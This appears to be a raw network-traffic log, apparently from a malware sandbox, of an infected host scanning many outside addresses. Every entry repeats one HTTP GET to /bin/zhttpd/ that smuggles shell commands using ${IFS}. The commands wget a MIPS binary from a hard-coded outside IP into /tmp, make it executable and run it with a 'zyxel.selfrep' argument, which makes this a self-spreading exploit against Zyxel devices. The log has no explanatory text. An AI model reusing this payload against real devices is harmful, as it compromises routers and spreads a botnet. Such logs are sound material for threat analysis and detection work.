                                                Jan 12, 2024 18:24:47.142637014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7309192.168.2.134894244.57.11.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.142702103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7310192.168.2.135659217.35.229.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.142730951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7311192.168.2.1348710192.161.217.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.142800093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7312192.168.2.1334560119.16.228.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.142858982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7313192.168.2.134016897.213.161.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.142901897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7314192.168.2.134563450.254.76.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.142957926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7315192.168.2.1356938157.229.234.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.143002987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7316192.168.2.1344028188.247.0.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.143076897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7317192.168.2.1339450176.255.149.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.143093109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7318192.168.2.136003847.202.6.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.143141031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7319192.168.2.134513882.200.252.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.143208027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7320192.168.2.1354964117.197.101.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.143246889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7321192.168.2.13442725.125.98.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.143305063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7322192.168.2.1335958133.125.120.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.143369913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7323192.168.2.134517275.94.220.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.143420935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7324192.168.2.1349488206.201.79.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.143472910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7325192.168.2.1334934181.15.54.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.143534899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7326192.168.2.133629245.27.30.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.143591881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7327192.168.2.1338598123.121.166.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.143647909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7328192.168.2.133686867.19.72.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.143704891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7329192.168.2.1359180143.106.237.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.143738031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7330192.168.2.1360420135.105.0.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.143798113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7331192.168.2.1350258119.9.3.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.143847942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7332192.168.2.134652665.179.150.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.143903017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7333192.168.2.1356198171.165.132.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.143948078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7334192.168.2.1349838155.175.29.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.144000053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7335192.168.2.134515439.15.174.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.144062996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7336192.168.2.1338336183.22.215.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.144087076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7337192.168.2.134314286.98.139.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.144151926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7338192.168.2.135820619.121.141.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.144220114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7339192.168.2.1359062180.98.118.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.144244909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7340192.168.2.133620244.46.95.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.144289017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7341192.168.2.13604065.46.81.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.144356966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7342192.168.2.133706876.115.39.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.144398928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7343192.168.2.1341600106.71.245.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.144448996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7344192.168.2.1359006128.107.123.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.144515991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7345192.168.2.13482028.44.238.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.144558907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7346192.168.2.1358422160.66.157.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.144617081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7347192.168.2.135569044.236.4.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.144676924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7348192.168.2.134719035.204.216.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.144728899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7349192.168.2.1347986198.101.14.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.144774914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7350192.168.2.1334720195.250.141.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.144824982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7351192.168.2.1345414221.199.105.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.144893885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7352192.168.2.135404812.40.117.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.144959927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7353192.168.2.133423413.18.248.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.145014048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7354192.168.2.1352638154.197.5.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.145047903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7355192.168.2.1334300185.194.51.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.145090103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7356192.168.2.1333096131.97.13.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.145155907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7357192.168.2.134637047.223.104.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.145215988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7358192.168.2.135720883.223.119.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.145267963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7359192.168.2.1358274164.118.213.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.145308971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7360192.168.2.1345906120.51.165.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.145365000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7361192.168.2.1338254198.6.235.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.145421982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7362192.168.2.1348408202.232.129.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.145492077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7363192.168.2.1353244107.77.50.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.145526886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7364192.168.2.1337790121.172.120.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.145586014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7365192.168.2.133497884.230.6.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.145646095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7366192.168.2.1347938105.252.34.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.145704985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7367192.168.2.1338188106.45.67.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.145751953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7368192.168.2.1341930193.49.50.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.145791054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7369192.168.2.134820623.130.111.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.145849943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7370192.168.2.135701446.232.168.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.145901918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7371192.168.2.1346058128.195.75.38443
                                                TimestampBytes transferredDirectionData
